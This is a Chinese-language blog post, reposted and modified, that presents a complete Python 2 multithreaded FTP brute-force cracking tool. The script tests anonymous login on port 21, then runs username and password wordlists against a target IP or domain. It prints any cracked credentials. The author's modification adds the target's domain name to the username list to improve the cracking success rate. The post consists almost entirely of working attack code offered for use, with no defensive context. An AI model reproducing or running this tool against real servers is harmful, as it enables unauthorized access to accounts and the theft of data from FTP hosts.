FTP暴力破解代碼

轉自：www.waitalone.cn/python-ftp-…

在原基礎上增長：若是用戶輸入的目標是域名，則將域名加入到爆破用戶列表中，增長爆破成功率：

#!/usr/bin/env python 
# -*- coding: utf-8 -*- 
import ftplib, socket  
import sys, time, re, os  
from functools import partial  
from multiprocessing.dummy import Pool as ThreadPool  
  
  
def usage():  
    print '+' + '-' * 50 + '+'  
    print '\t Python FTP暴力破解工具多線程版'  
    print '\t\t Time：2014-09-05'  
    print '+' + '-' * 50 + '+'  
    if len(sys.argv) != 4:  
        print "用法: "+os.path.basename(sys.argv[0])+" 待破解的ip/domain 用戶名列表 字典列表"  
        print "實例: "+os.path.basename(sys.argv[0])+" www.alin.cn user.txt pass.txt"  
        sys.exit()  
  
  
def brute_anony():  
    try:  
        print '[+] 測試匿名登錄……\n'  
        ftp = ftplib.FTP()  
        ftp.connect(host, 21, timeout=5)  
        print 'FTP消息: %s \n' % ftp.getwelcome()  
        ftp.login()  
        ftp.retrlines('LIST')  
        ftp.quit()  
        print '\n[+] 匿名登錄成功……\n'  
    except ftplib.all_errors:  
        print '\n[-] 匿名登錄失敗！\n'  
  
  
def brute_users(user, pwd):  
    try:  
        ftp = ftplib.FTP()  
        ftp.connect(host, 21, timeout=2)  
        ftp.login(user, pwd)  
        ftp.quit()  
        print '\n[+] 破解成功，用戶名：%s 密碼：%s\n' % (user, pwd)  
    except ftplib.all_errors:  
        pass  
  
  
if __name__ == '__main__':  
    usage()  
    start_time = time.time()  
    thrdlist = []  
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):  
        host = sys.argv[1]  
    else:  
        host = socket.gethostbyname(sys.argv[1])  
        isExist = 0  
        isExist1 = 0  
        with open(sys.argv[2],'r') as tmp:  
            for line in tmp.readlines():  
                if sys.argv[1] in line:  
                    isExist = 1  
                    if isExist1 == 1:  
                        break  
                if re.sub(r'\.\w+$','',sys.argv[1]) in line:  
                    isExist1 = 1  
                    if isExist == 1:  
                        break  
        with open(sys.argv[2],"a") as f:  
            if isExist == 0:  
                f.write("\n"+sys.argv[1])  
            if isExist1 == 0:  
                f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))  
    userlist = [i.rstrip() for i in open(sys.argv[2])]  
    passlist = [j.rstrip() for j in open(sys.argv[3])]  
    print '目 標：%s \n' % sys.argv[1]  
    print '用戶名：%d 條\n' % len(userlist)  
    print '密 碼：%d 條\n' % len(passlist)  
    brute_anony()  
    print '\n[+] 暴力破解測試中……\n'  
    for user in userlist:  
        partial_user = partial(brute_users, user)  
        pool = ThreadPool(10)  
        pool.map(partial_user, passlist)  
        pool.close()  
        pool.join()  
    print '[+] 破解完成，用時： %d 秒' % (time.time() - start_time)  
複製代碼